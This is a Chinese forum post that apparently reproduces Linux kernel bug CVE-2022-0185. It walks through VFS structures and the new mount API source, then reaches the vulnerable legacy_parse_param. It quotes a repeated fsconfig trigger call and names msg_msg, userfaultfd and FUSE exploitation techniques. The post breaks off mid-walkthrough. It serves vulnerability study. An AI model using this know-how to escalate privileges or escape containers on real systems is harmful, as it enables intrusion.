【Linux kernel 漏洞复现】CVE-2022-0185

peiwithhao · 发表于 2023-10-10 19:03

本帖最后由 peiwithhao 于 2023-10-10 19:05 编辑

CVE-2022-0185

算是第一次进行Linux的漏洞分析，其中还是有许多不足，复现还有几种手法没实现完全

一、背景

由BitsByWill大师提出，以此赢得了31337刀的奖金(但看评论好像本来是50K，最后起了点矛盾降价惹)以及成功在google kctf中实现容器逃逸

整个漏洞利用了VFS中 fsconfig某个参数实现的函数过程当中的一个整形溢出来实现越界写，其中利用手法也是十分精彩，原作者博客是利用到他曾经在 corctf2021上出的一道 fire of selvation，此外作者好朋友D3V17也在当年出了同样一道题目，但是难度会在前面的题更大，wall of perdition,其中便是使用 msg_msg搭配 userfaultfd来实现任意写或者读，而为了应用到本次漏洞，考虑到高版本userfaultfd无法为普通用户使用，所以让 FUSE来代替 userfaultfd，一般前者不会在CTF赛事当中出现，他需要在有着完备的环境条件才可使用，就比如说真机，而 BitesByWill师傅也顺便写了一个简单的fuse库来辅助利用orz

二、文件系统基础知识

1.VFS基本概念

早就听说过虚拟文件系统的大名，网上的解释如下：

VFS（Virtual Filesystem Switch）称为虚拟文件系统或虚拟文件系统转换，是一个内核软件层，在具体的文件系统之上抽象的一层，用来处理与Posix文件系统相关的所有调用，表现为能够给各种文件系统提供一个通用的接口，使上层的应用程序能够使用通用的接口访问不同文件系统，同时也为不同文件系统的通信提供了媒介

从概念上来看其实十分的简单易懂,也就是类似开发中的面向接口编程了,他为不同的文件系统定义了一个普遍的接口,所以不同文件系统只需要按照这个规定好的接口来构造即可,具体实现部分可以按照自己的思路来

在我们的oS当中,整体布局可以用下面这个图来表示,CSDN找的,侵删.不得不说这个图画的十分的好,我就自己不献丑了

平常我们所使用的系统调用也是第一先经过VFS,通过他提供的接口来进行系统调用的操作,当然具体实现还是看底层真正存在的文件系统类型了,但是在用户层程序员的眼中看来并无太大区别,由于不同文件系统的多样性和用户系统调用的复杂性,VFS文件系统这一抽象层的存在是十分具有存在意义的.

2.VFS抽象接口

上述示例中提到VFS也有自己的文件模型，用来支持操作系统的系统调用。下面是VFS抽象模型支持的所有Linux系统调用：

文件系统相关：mount, umount, umount2, sysfs, statfs, fstatfs, fstatfs64, ustat
目录相关：chroot，pivot_root，chdir，fchdir，getcwd，mkdir，rmdir，getdents，getdents64，readdir，link，unlink，rename，lookup_dcookie
链接相关：readlink，symlink
文件相关：chown， fchown，lchown，chown16，fchown16，lchown16，hmod，fchmod，utime，stat，fstat，lstat，acess，oldstat，oldfstat，oldlstat，stat64，lstat64，lstat64，open，close，creat，umask，dup，dup2，fcntl， fcntl64，select，poll，truncate，ftruncate，truncate64，ftruncate64，lseek，llseek，read，write，readv，writev，sendfile，sendfile64，readahead

3.VFS Common File Model

就是说文件系统的抽象化模型,在我们硬盘之中,扇区普遍设置为512字节,而我们内存与硬盘的交互是十分缓慢的,所以一般数据交换并不以扇区(sectors)为单位,而是以块(block)为单位,块一般为4KB大小

硬盘中文件系统就是用来存放文件信息的,其中不仅有文件类容,还需要存放一些关于文件的信息,例如说文件归属,文件权限等,因此在文件系统中会存放inode节点,在之前自己实现的OS当中是存放了文件数据的扇区号等等用来方便访问.我们最初的open系统调用实际上就是将inode节点从硬盘转到内存了而已.

文件系统中定义了四个较为重要的对象,他们合在一起便构建了我们的统一文件模型,接下来分别介绍他们

1.Superblock

超级块,Unix的特色,里面存放了一系列我们需要使用的元信息,相当于是一个统筹全局的资料库

他的数据结构体被存放于include/linux/fs.h中,大家有兴趣可以详细查看

struct super_block {
        struct list_head        s_list;                /* Keep this first */                 //链接各超级块
        dev_t                        s_dev;                /* search index; _not_ kdev_t */
        unsigned char                s_blocksize_bits;
        unsigned long                s_blocksize;
        loff_t                        s_maxbytes;        /* Max file size */
        struct file_system_type        *s_type;
        const struct super_operations        *s_op;                                 //操作文件系统的函数指针
        const struct dquot_operations        *dq_op;
        const struct quotactl_ops        *s_qcop;
        const struct export_operations *s_export_op;
        unsigned long                s_flags;
        unsigned long                s_iflags;        /* internal SB_I_* flags */
        unsigned long                s_magic;
        struct dentry                *s_root;                                 //根目录入口点
        struct rw_semaphore        s_umount;
        int                        s_count;
        atomic_t                s_active;

        ...

} __randomize_layout;

一般我们的超级块都会存放在该文件系统的头部,由于linux一般可以挂在多个文件系统,所以这个超级块的s_list字段就是用来链接下一个超级快

2.inode

他标识了一个存在于硬盘中的文件，他在内存当中是以VFS inode存在，在硬盘中则可能有些许不同，可能包含了存放在硬盘中不需要的一些字段，可能有某种不以inode进行管理的文件系统，~~说的就是你们，FAT和Reiserfs~~，VFS的处理方式就是将其中的特定信息赋值给内存中的inode

/*
 * Keep mostly read-only and often accessed (especially for
 * the RCU path lookup and 'stat' data) fields at the beginning
 * of the 'struct inode'
 */
struct inode {
        umode_t                        i_mode;
        unsigned short                i_opflags;
        kuid_t                        i_uid;
        kgid_t                        i_gid;
        unsigned int                i_flags;

        ...

} __randomize_layout;

3.dentry

目录项缓存，Linux使用它来快速访问此前的查找操作的结果。在VFS连同文件系统实现读取的一个目录项（目录或文件）的数据之后，则创建一个dentry实例，以缓存找到的数据，这样下次我们寻找该文件/目录则会首先从该缓存找起，而不是再次通过文件名来到查找相应目录项了

struct dentry {
        /* RCU lookup touched fields */
        unsigned int d_flags;                /* protected by d_lock */
        seqcount_spinlock_t d_seq;        /* per dentry seqlock */
        struct hlist_bl_node d_hash;        /* lookup hash list */
        struct dentry *d_parent;        /* 父目录 */
        struct qstr d_name;
        struct inode *d_inode;                /* 该文件名所属inode，如果不存在则为NULL */
        unsigned char d_iname[DNAME_INLINE_LEN];        /* small names */

        /* Ref lookup also touches following */
        struct lockref d_lockref;        /* per-dentry lock and refcount */
        const struct dentry_operations *d_op;
        struct super_block *d_sb;        /* The root of the dentry tree */
        unsigned long d_time;                /* used by d_revalidate */
        void *d_fsdata;                        /* fs-specific data */

        union {
                struct list_head d_lru;                /* LRU list */
                wait_queue_head_t *d_wait;        /* in-lookup ones only */
        };
        struct list_head d_child;        /* child of parent list */
        struct list_head d_subdirs;        /* our children */
        /*
         * d_alias and d_rcu can share memory
         */
        union {
                struct hlist_node d_alias;        /* inode alias list */
                struct hlist_bl_node d_in_lookup_hash;        /* only for in-lookup ones */
                 struct rcu_head d_rcu;
        } d_u;
} __randomize_layout;

4.传统mount系统调用

我们平时都会使用mount系统调用来挂在某一文件系统，我们可以查看一下Linux手册

SYNOPSIS
       mount [-h|-V]

       mount [-l] [-t fstype]

       mount -a [-fFnrsvw] [-t fstype] [-O optlist]

       mount [-fnrsvw] [-o options] device|mountpoint

       mount [-fnrsvw] [-t fstype] [-o options] device mountpoint

       mount --bind|--rbind|--move olddir newdir

       mount --make-[shared|slave|private|unbindable|rshared|rslave|rprivate|runbindable] mountpoint

我们通常会采用下面命令来进行挂载

mount -t xfs /dev/sdb1 -o /mnt/temp

具体含义就是将/dev/sdb1设备代表的文件系统以xfs文件系统的格式来挂载到/mnt/temp目录下，这样就加入到了我们/根目录的文件树当中，这样以来我们才可以正常访问其中内容，除了Linux实际上windows也存在挂载操作，但为了简化我们用户的使用就隐藏了这一点

除了命令行使用的mount，我们来关注一下代码当中使用的mount系统调用，以下查看手册

man 2 mount

mount(2)                                                                                              System Calls Manual                                                                                              mount(2)

NAME
       mount - mount filesystem

LIBRARY
       Standard C library (libc, -lc)

SYNOPSIS
       #include <sys/mount.h>

       int mount(const char *source, const char *target,
                 const char *filesystemtype, unsigned long mountflags,
                 const void *_Nullable data);

DESCRIPTION
       mount() 将源指定的文件系统（通常是引用设备的路径名，但也可以是目录或文件的路径名，或虚拟字符串）附加到路径名指定的位置（目录或文件） 在目标中。

       挂载文件系统需要适当的权限（Linux：CAP_SYS_ADMIN 功能）。

       Values for the filesystemtype argument supported by the kernel are listed in /proc/filesystems (e.g., "btrfs", "ext4", "jfs", "xfs", "vfat", "fuse", "tmpfs", "cgroup", "proc",  "mqueue",  "nfs",  "cifs",  "iso9660").
       Further types may become available when the appropriate modules are loaded.

       数据参数由不同的文件系统解释。 通常，它是该文件系统可以理解的一串以逗号分隔的选项。 有关每种文件系统类型可用选项的详细信息，请参阅 mount(8)。 如果没有选项，则可以将该参数指定为 NULL。

       A call to mount() performs one of a number of general types of operation, depending on the bits specified in mountflags.  The choice of which operation to perform is determined by testing the bits set in  mountflags,
       with the tests being conducted in the order listed here:

       •  Remount an existing mount: mountflags includes MS_REMOUNT.

       •  Create a bind mount: mountflags includes MS_BIND.

       •  Change the propagation type of an existing mount: mountflags includes one of MS_SHARED, MS_PRIVATE, MS_SLAVE, or MS_UNBINDABLE.

       •  Move an existing mount to a new location: mountflags includes MS_MOVE.

       •  Create a new mount: mountflags includes none of the above flags.

       Each of these operations is detailed later in this page.  Further flags may be specified in mountflags to modify the behavior of mount(), as described below.

5.注册文件系统

1.定义文件系统类型(file_system_type)

在注册之前，我们需要先定义一个属于自身文件系统类型的结构体struct file_system_type

struct file_system_type {
        const char *name;
        int fs_flags;
#define FS_REQUIRES_DEV                1 
#define FS_BINARY_MOUNTDATA        2
#define FS_HAS_SUBTYPE                4
#define FS_USERNS_MOUNT                8        /* Can be mounted by userns root */
#define FS_DISALLOW_NOTIFY_PERM        16        /* Disable fanotify permission events */
#define FS_RENAME_DOES_D_MOVE        32768        /* FS will handle d_move() during rename() internally. */
        int (*init_fs_context)(struct fs_context *);
        const struct fs_parameter_description *parameters;
        struct dentry *(*mount) (struct file_system_type *, int,
                       const char *, void *);
        void (*kill_sb) (struct super_block *);
        struct module *owner;
        struct file_system_type * next;
        struct hlist_head fs_supers;

        struct lock_class_key s_lock_key;
        struct lock_class_key s_umount_key;
        struct lock_class_key s_vfs_rename_key;
        struct lock_class_key s_writers_key[SB_FREEZE_LEVELS];

        struct lock_class_key i_lock_key;
        struct lock_class_key i_mutex_key;
        struct lock_class_key i_mutex_dir_key;
};

下面我们来分别解释

name:文件系统的名字，如ext2/3,xfs等等
fs_flags:文件系统类型
- FS_REQUIRES_DEV:文件系统必须在物理设备上(/proc文件系统就不再物理设备上)
- FS_BINARY_MOUNTDATA:当需要mount的文件系统是二进制格式下时
- FS_HAS_SUBTYPE:文件系统有一个子类型。它是从名称中提取出来并作为参数传入的,最常见的就是FUSE，FUSE本是不是真正的文件系统，所以要通过子文件系统类型来区别通过FUSE接口实现的不同文件系统。
- FS_USERNS_MOUNT:可以由root用户挂载(?
- FS_RENAAME_DOES_D_MOVE: 文件系统将会在rename()函数期间处理d_move()
mount():代替早期的get_sb()函数，这个sb指的是超级块，并作为用户挂载此文件系统时所使用的回调函数
kill_sb():删除内存中所存在的超级块，用作卸载文件系统
owner:指向实现这个文件系统的模块，通常表示为宏THIS_MODULE
next:指向链接的下一个文件系统类型
fs_supers:此文件系统类型的文件系统超级块都串联在该list_head之下

在定义完对应的文件系统类型结构体之后，我们需要将文件系统注册进内核

2.注册文件系统

首先我们可以查看源码fs/filesystem.c

里面定义了大量的系统调用，其中文件开头定义了一个全局变量

static struct file_system_type *file_systems;

可以看到该值的类型为一个指向file_system_type的指针，这个指针全局变量指向的是内存中所有存在的文件系统类型

这里我们就来看相关的注册函数

/**
 *        register_filesystem - register a new filesystem
 *        @fs: the file system structure
 *
 *        将传递的文件系统添加到内核为挂载和其他系统调用所知的文件系统列表中。
 *  成功时返回 0，错误时返回负 errno 代码.
 *
 *        The &struct file_system_type that is passed is linked into the kernel 
 *        structures and must not be freed until the file system has been
 *        unregistered.
 */

int register_filesystem(struct file_system_type * fs)
{
        int res = 0;
        struct file_system_type ** p;

        if (fs->parameters && !fs_validate_description(fs->parameters))
                return -EINVAL;

        BUG_ON(strchr(fs->name, '.'));
        if (fs->next)
                return -EBUSY;
        write_lock(&file_systems_lock);
        p = find_filesystem(fs->name, strlen(fs->name));
        if (*p)
                res = -EBUSY;
        else
                *p = fs;
        write_unlock(&file_systems_lock);
        return res;
}

这里我们观察到重点函数find_filesystem，跟进查看

static struct file_system_type **find_filesystem(const char *name, unsigned len)
{
        struct file_system_type **p;
        for (p = &file_systems; *p; p = &(*p)->next)
                if (strncmp((*p)->name, name, len) == 0 &&
                    !(*p)->name[len])
                        break;
        return p;
}

就是通过全局变量file_systems通过链条来查找类型而已，找到了就返回对应的file_system_type指针

这样以来我们的register_filesystem的大致功能就是首先找到对应文件系统类型指针，如果不存在，则将该文件系统类型链入到全局链表的末尾，若存在则返回-EBUSY错误

经过上述函数，我们的文件系统模块才算是成功注册进内核，然后我们之后就可以使用mount系统调用继续进行挂载

6.新一代VFS mount系统调用

有大哥觉得过去的mount系统调用有许多不同的缺点，在老哥发起整改号召前，传统mount()系统调用一直被广泛使用，即使其中有着些许改变但是仍未改变其接口特性。但是在背后VFS派的AL Viro早就对此系统调用十分不满，希望迎来变革，这一密谋终于在2018年的LSFMM大会被公开，他们号召完全改写mount的系统调用接口,他们指出了传统mount系统调用中的一系列难以修复漏洞和bug，在Linux 内核5.2版本后，新一代mount API就被整合到主线Linux

new mount API introduce

上面是arttnba3师傅复现博客原话:dog:

# mkfs.xfs -f /dev/sdb1
# cat old-mount-xfs.c
#include <sys/mount.h>  
#include <stdio.h>  

int main(int argc, char *argv[]) {  
        if (mount("/dev/sdb1", "/mnt/scratch", "xfs", 0, NULL)) {  
                perror("mount failed");  
        }
        return 0;  
}

# gcc -Wall -o old-mount-xfs old-mount-xfs.c
# ./mymount 
# cat /proc/mounts |grep sdb1
/dev/sdb1 /mnt/scratch xfs rw,seclabel,relatime,attr2,inode64,noquota 0 0

如上图所示我们使用传统的mount系统调用十分简单，只需要简单调用上面的函数接口即可，但是当new mount API引入之后，以前臃肿、冗杂的mount系统调用被拆解为一个一个小块来进行实现，

而我们的new mount API的使用，按照官方文档来说，遵循以下步骤

        fd = fsopen("nfs");
        fsconfig(fd, FSCONFIG_SET_STRING, "option", "val", 0);
        fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0);
        mfd = fsmount(fd, MS_NODEV);
        move_mount(mfd, "", AT_FDCWD, "/mnt", MOVE_MOUNT_F_EMPTY_PATH);

下面我们来分别介绍（由于本次复现打算在5.4上面复现，所以下面的源码都是取自kernel.5.4.101）

1.fsopen(打开文件系统类型)

/*
 * 通过名字打开一个文件系统，然后为了接下来的挂载来进行配置
 *
 * 我们可以指定将在其中打开文件系统的容器，
 * 从而指示将使用哪些名称空间（特别是，哪个网络名称空间将用于网络文件系统）。
 */
SYSCALL_DEFINE2(fsopen, const char __user *, _fs_name, unsigned int, flags)
{
        struct file_system_type *fs_type;
        struct fs_context *fc;
        const char *fs_name;
        int ret;

        if (!ns_capable(current->nsproxy->mnt_ns->user_ns, CAP_SYS_ADMIN))
                return -EPERM;

        if (flags & ~FSOPEN_CLOEXEC)
                return -EINVAL;

        fs_name = strndup_user(_fs_name, PAGE_SIZE);
        if (IS_ERR(fs_name))
                return PTR_ERR(fs_name);

        fs_type = get_fs_type(fs_name);                 //通过我们传入文件系统的名称来获取对应的fs_system_type
        kfree(fs_name);
        if (!fs_type)
                return -ENODEV;

        fc = fs_context_for_mount(fs_type, 0);         //通过fs_type来准备mount上下文

        ...

}

这里需要注意我们的fsopen并不是打开了一个位于硬盘上的具体的文件系统(on-disk),而是打开了一个文件系统类型（file_system_type）

fs_context_for_mount

其中后面会调用fs_context_for_mount函数，然后调用到alloc_fs_context,其中传入的参数如下：

enum fs_context_purpose {
        FS_CONTEXT_FOR_MOUNT,                /* New superblock for explicit mount */
        FS_CONTEXT_FOR_SUBMOUNT,        /* New superblock for automatic submount */
        FS_CONTEXT_FOR_RECONFIGURE,        /* Superblock reconfiguration (remount) */
};

struct fs_context *fs_context_for_mount(struct file_system_type *fs_type,
                                        unsigned int sb_flags)
{
        return alloc_fs_context(fs_type, NULL, sb_flags, 0,
                                        FS_CONTEXT_FOR_MOUNT);
}

alloc_fs_context

/**
 * alloc_fs_context - Create a filesystem context.
 * @fs_type: The filesystem type.
 * @reference: The dentry from which this one derives (or NULL)
 * @sb_flags: Filesystem/superblock flags (SB_*)
 * @sb_flags_mask: Applicable members of @sb_flags
 * @purpose: The purpose that this configuration shall be used for.
 *
 * 打开文件系统并创建挂载上下文。 
 * 挂载上下文使用提供的标志进行初始化，并且如果提供了来自另一个超级块（由 @reference 引用）的子挂载/自动挂载，
 * 则可能具有从该超级块复制的名称空间等参数。
 */
static struct fs_context *alloc_fs_context(struct file_system_type *fs_type,
                                      struct dentry *reference,
                                      unsigned int sb_flags,
                                      unsigned int sb_flags_mask,
                                      enum fs_context_purpose purpose)
{
        int (*init_fs_context)(struct fs_context *);
        struct fs_context *fc;
        int ret = -ENOMEM;

        fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL_ACCOUNT);
        if (!fc)
                return ERR_PTR(-ENOMEM);

        fc->purpose        = purpose;
        fc->sb_flags        = sb_flags;
        fc->sb_flags_mask = sb_flags_mask;
        fc->fs_type        = get_filesystem(fs_type);
        fc->cred        = get_current_cred();
        fc->net_ns        = get_net(current->nsproxy->net_ns);
        fc->log.prefix        = fs_type->name;

        mutex_init(&fc->uapi_mutex);

        switch (purpose) {
        case FS_CONTEXT_FOR_MOUNT:
                fc->user_ns = get_user_ns(fc->cred->user_ns);
                break;
        case FS_CONTEXT_FOR_SUBMOUNT:
                fc->user_ns = get_user_ns(reference->d_sb->s_user_ns);
                break;
        case FS_CONTEXT_FOR_RECONFIGURE:
                atomic_inc(&reference->d_sb->s_active);
                fc->user_ns = get_user_ns(reference->d_sb->s_user_ns);
                fc->root = dget(reference);
                break;
        }

        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        if (ret < 0)
                goto err_fc;
        fc->need_free = true;
        return fc;

err_fc:
        put_fs_context(fc);
        return ERR_PTR(ret);
}

这里我们发现代码首先是利用kzalloc分配了一个fs_context结构体，也就是我们的一个文件系统上下文，如下：

fscontext结构体

/*
 * 文件系统上下文，用于保存创建或重新配置超级块时使用的参数。
 *
 * Superblock creation fills in ->root whereas reconfiguration begins with this
 * already set.
 *
 * See Documentation/filesystems/mount_api.rst
 */
struct fs_context {
        const struct fs_context_operations *ops;
        struct mutex                uapi_mutex;        /* Userspace access mutex */
        struct file_system_type        *fs_type;          /* 文件系统类型 */
        void                        *fs_private;        /* 文件系统上下文 */
        void                        *sget_key;
        struct dentry                *root;                /* rooth */
        struct user_namespace        *user_ns;        /* 本次mount的用户命名空间 */
        struct net                *net_ns;        /* 本次mount的网络命名空间 */
        const struct cred        *cred;                /* The mounter's credentials */
        struct p_log                log;                /* 日志缓冲区 */
        const char                *source;        /* The source name (eg. dev path) */
        void                        *security;        /* Linux S&M options */
        void                        *s_fs_info;        /* Proposed s_fs_info */
        unsigned int                sb_flags;        /* Proposed superblock flags (SB_*) */
        unsigned int                sb_flags_mask;        /* Superblock flags that were changed */
        unsigned int                s_iflags;        /* OR'd with sb->s_iflags */
        unsigned int                lsm_flags;        /* Information flags from the fs to the LSM */
        enum fs_context_purpose        purpose:8;
        enum fs_context_phase        phase:8;        /* The phase the context is in */
        bool                        need_free:1;        /* Need to call ops->free() */
        bool                        global:1;        /* Goes into &init_user_ns */
        bool                        oldapi:1;        /* Coming from mount(2) */
};

看到上面代码后面有这样一段

        ...
        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        ...

其中调用了我们fs_type->init_fs_context函数（但是该指针好像初始为0，所以一般init_fs_context会指向legacy_init_fs_context,该函数将会在之后漏洞介绍开始讲解），这是在新一代mount系统调用中增添的函数指针字段，之后就是初始化我们新创建的fs_context，然后返回给最初的fsopen系统调用

因此我们接着来分析后半段的fsopen


        ...

        put_filesystem(fs_type);
        if (IS_ERR(fc))
                return PTR_ERR(fc);

        fc->phase = FS_CONTEXT_CREATE_PARAMS;

        ret = fscontext_alloc_log(fc);
        if (ret < 0)
                goto err_fc;

        return fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0);

err_fc:
        put_fs_context(fc);
        return ret;
}

首先他会调用fscontext_alloc_log(fc),该函数的作用就是为该次文件系统上下文的log字段分配空间，然后将其中的log字段的owner指向当前文件系统类型(filesystem_type)的模块指针owner字段

之后我们调用fscontext_create_fd函数，其中存在以下调用链

fscontext_create_fd(fc, flags & FSOPEN_CLOEXEC ? O_CLOEXEC : 0)
        anon_inode_getfd("[fscontext]", &fscontext_fops, fc, O_RDWR | o_flags)
                __anon_inode_getfd(name, fops, priv, flags, NULL, false)

其功能是为了返回一个同文件系统类型相联系的fd号，就跟咱们打开文件一样

__anon_inode_getfd

const struct file_operations fscontext_fops = {
        .read                = fscontext_read,
        .release        = fscontext_release,
        .llseek                = no_llseek,
};

static int __anon_inode_getfd(const char *name,
                              const struct file_operations *fops,
                              void *priv, int flags,                                         //这里priv就是之前创建的fscontext
                              const struct inode *context_inode,                 //为NULL，匿名inode
                              bool secure)
{
        int error, fd;
        struct file *file;

        error = get_unused_fd_flags(flags);         //获取空闲文件描述符
        if (error < 0)
                return error;
        fd = error;

        file = __anon_inode_getfile(name, fops, priv, flags, context_inode, secure);  //获取一个[fscontext]的文件实例，其中的文件函数指针被设置为"fscontext_fops"
        if (IS_ERR(file)) {
                error = PTR_ERR(file);
                goto err_put_unused_fd;
        }
        fd_install(fd, file);

        return fd;

err_put_unused_fd:
        put_unused_fd(fd);
        return error;
}

该函数整体的功能就是创建一个[fscontext]文件实例，然后返回fd号，这里也是同我们之前的fscontext创建了联系，创建联系的关键函数就是

__anon_inode_getfile(name, fops, priv, flags, context_inode, secure)

该函数有这样一段代码

file->private_data = priv;

其中file的private_date 被赋值为我们的priv，该字段通过咱们之前的分析是指向了先前创建的fscontext的，通过这一链接，我们就可以通过特殊的文件函数指针来进行相关操作了

这里总结一下fsopen的步骤

获取相应的文件系统类型
构建文件系统上下文，fscontext，将其与上面的fstype通过字段相关联
获取[fscontext]文件，通过字段与fscontext相关联，且其中函数指针为一个全局虚函数表
返回上面文件的描述符fd，以后都是通过该描述符来进行操作

调用链为

sys_fsopen
        get_fs_type                 //获取fs_type
        fs_context_for_mount
                alloc_fs_context         //分配fscontext以及初始化部分字段
        fscontext_alloc_log         
        fscontext_create_fd         
                anon_inode_getfd
                        __anon_inode_getfd         //创建文件与fscontext关联，并返回fd

2.fsconfig

/**
 * sys_fsconfig - 在一个上下文当中设置参数并且触发行动
 * @fd: 之前fsopen获得的文件系统上下文相关联的fd
 * @cmd: 指令
 * @_key: 键
 * @_value: 值
 * @aux: value参数的附加信息
 *
 * This system call is used to set parameters on a context, including
 * superblock settings, data source and security labelling.
 *
 * Actions include triggering the creation of a superblock and the
 * reconfiguration of the superblock attached to the specified context.
 *
 * When setting a parameter, @cmd indicates the type of value being proposed
 * and @_key indicates the parameter to be altered.
 *
 * @_value and @aux are used to specify the value, should a value be required:
 *
 * (*) fsconfig_set_flag: No value is specified.  The parameter must be boolean
 *     in nature.  The key may be prefixed with "no" to invert the
 *     setting. @_value must be NULL and @aux must be 0.
 *
 * (*) fsconfig_set_string：指定字符串值。 
 * 该参数可以是布尔值、整数、字符串或采用路径。 
 * 将尝试转换为适当的类型（可能包括作为路径查找）。 
 * @_value 指向以 NUL 结尾的字符串，@aux 必须为 0。
 *
 * (*) fsconfig_set_binary: A binary blob is specified.  @_value points to the
 *     blob and @aux indicates its size.  The parameter must be expecting a
 *     blob.
 *
 * (*) fsconfig_set_path: A non-empty path is specified.  The parameter must be
 *     expecting a path object.  @_value points to a NUL-terminated string that
 *     is the path and @aux is a file descriptor at which to start a relative
 *     lookup or AT_FDCWD.
 *
 * (*) fsconfig_set_path_empty: As fsconfig_set_path, but with AT_EMPTY_PATH
 *     implied.
 *
 * (*) fsconfig_set_fd: An open file descriptor is specified.  @_value must be
 *     NULL and @aux indicates the file descriptor.
 */
SYSCALL_DEFINE5(fsconfig,
                int, fd,
                unsigned int, cmd,
                const char __user *, _key,
                const void __user *, _value,
                int, aux)
{
        struct fs_context *fc;
        struct fd f;
        int ret;
        int lookup_flags = 0;

...

三、漏洞介绍

该漏洞适用于内核版本5.1，且至少持续到5.16，通过syzbot检测到并进行利用，其中洞主在博客中首先给出了一个崩溃poc，但是我在5.4内核版本的linux当中无法触发，因此下面来尝试分析一下漏洞链条和自行编写触发漏洞poc

1.崩溃链

首先对于fsopen在之前已经讲解的十分清楚，就是返回一个与fscontext相关联的fd而已，然后重要的就是后面的fsconfig系统调用，

可以看到上面poc中不停调用以下代码

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

其中cmd指针传递的FSCONFIG_SET_STRING,这里注意我们的键值都不能为null，不然就直接返回错误了，大伙也可以自行去查看相关源码，

咱们只关心即将调用到的函数链条，在系统调用fsconfig当中，他会走到下面这段代码


        struct fs_parameter param = {
                .type        = fs_value_is_undefined,
        };

        ...

        case FSCONFIG_SET_STRING:
                param.type = fs_value_is_string;
                param.string = strndup_user(_value, 256);
                if (IS_ERR(param.string)) {
                        ret = PTR_ERR(param.string);
                        goto out_key;
                }
                param.size = strlen(param.string);
                break;
        ...

                default:
                break;
        }

        ret = mutex_lock_interruptible(&fc->uapi_mutex);
        if (ret == 0) {
                ret = vfs_fsconfig_locked(fc, cmd, ¶m);
                mutex_unlock(&fc->uapi_mutex);
        }

...

其中param字段的数据结构如下：

/*
 * 配置参数
 */
struct fs_parameter {
        const char                *key;                /* 参数名称 */
        enum fs_value_type        type:8;                /* _value的类型 */
        union {
                char                *string;
                void                *blob;
                struct filename        *name;
                struct file        *file;
        };
        size_t        size;
        int        dirfd;
};

其中会调用到一个关键的开头函数vfs_fsconfig_locked,在该函数的switch当中会因为没有对应的case而走到default当中，并且在一般情况下这个if

条件是不满足的，如下：

        default:
                if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
                    fc->phase != FS_CONTEXT_RECONF_PARAMS)
                        return -EBUSY;

                return vfs_parse_fs_param(fc, param);
        }
        fc->phase = FS_CONTEXT_FAILED;
        return ret;
}

导致后面会调用vfs_parse_fs_param函数

vfs_parse_fs_param

int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
        int ret;

        if (!param->key)
                return invalf(fc, "Unnamed parameter\n");

        ret = vfs_parse_sb_flag(fc, param->key);

        ...

        if (fc->ops->parse_param) {
                ret = fc->ops->parse_param(fc, param);
                if (ret != -ENOPARAM)
                        return ret;
        }

        ...
}

他会调用fscontext中的ops函数表指向的parse_param函数，也就是解析我们传递的参数，这里fscontext所指向的表我们在之前分析fsopen的时候有讲到说在后面分析，如下：

        ...
        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        ...

willsroot原话

我们在漏洞利用中滥用的是 ext4。我们最初的模糊测试崩溃发生在 Plan 9 文件系统上。似乎在这两个文件系统（以及大量其他文件系统）中都没有设置 init_fs_context 字段，因此它们都默认为legacy并且可以沿着legacy_parse_param的路径走下去。

/*
 * Initialise a legacy context for a filesystem that doesn't support
 * fs_context.
 */
static int legacy_init_fs_context(struct fs_context *fc)
{
        fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL_ACCOUNT);
        if (!fc->fs_private)
                return -ENOMEM;
        fc->ops = &legacy_fs_context_ops;
        return 0;
}

具体函数表如下：

const struct fs_context_operations legacy_fs_context_ops = {
        .free                        = legacy_fs_context_free,
        .dup                        = legacy_fs_context_dup,
        .parse_param                = legacy_parse_param,
        .parse_monolithic        = legacy_parse_monolithic,
        .get_tree                = legacy_get_tree,
        .reconfigure                = legacy_reconfigure,
};

我们回到上面对于vfs_parse_fs_param的分析，他是调用了ops->parse_param函数，对应于函数表当中的legacy_parse_param函数，下面我们就来分析一下

legacy_parse_param

/*
 * 
 * 向旧配置添加参数。我们建立一个以逗号分隔的选项列表
 */
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
        struct legacy_fs_context *ctx = fc->fs_private;         //初始化时为zalloc分配的一段堆空间
        unsigned int size = ctx->data_size;                 //第一次调用的时候，size应该还是0
        size_t len = 0;
        int ret;

        ret = vfs_parse_fs_param_source(fc, param);
        if (ret != -ENOPARAM)
            return ret;

        if (ctx->param_type == LEGACY_FS_MONOLITHIC_PARAMS)
            return invalf(fc, "VFS: Legacy: Can't mix monolithic and individual options");

        switch (param->type) {
        case fs_value_is_string:
                len = 1 + param->size;                         //len被赋值为1+（_value）的长度
                fallthrough;
        case fs_value_is_flag:
                len += strlen(param->key);
                break;
        default:
                return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported",
                              param->key);
        }

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");
        if (strchr(param->key, ',') ||
            (param->type == fs_value_is_string &&
             memchr(param->string, ',', param->size)))
                return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
                              param->key);
        if (!ctx->legacy_data) {
                ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
                if (!ctx->legacy_data)
                        return -ENOMEM;
        }

        ctx->legacy_data[size++] = ',';
        len = strlen(param->key);
        memcpy(ctx->legacy_data + size, param->key, len);
        size += len;
        if (param->type == fs_value_is_string) {
                ctx->legacy_data[size++] = '=';
                memcpy(ctx->legacy_data + size, param->string, param->size);
                size += param->size;
        }
        ctx->legacy_data[size] = '\0';
        ctx->data_size = size;
        ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
        return 0;
}

我们接下来分批次查看上述源码

step1

首先便是一系列赋值

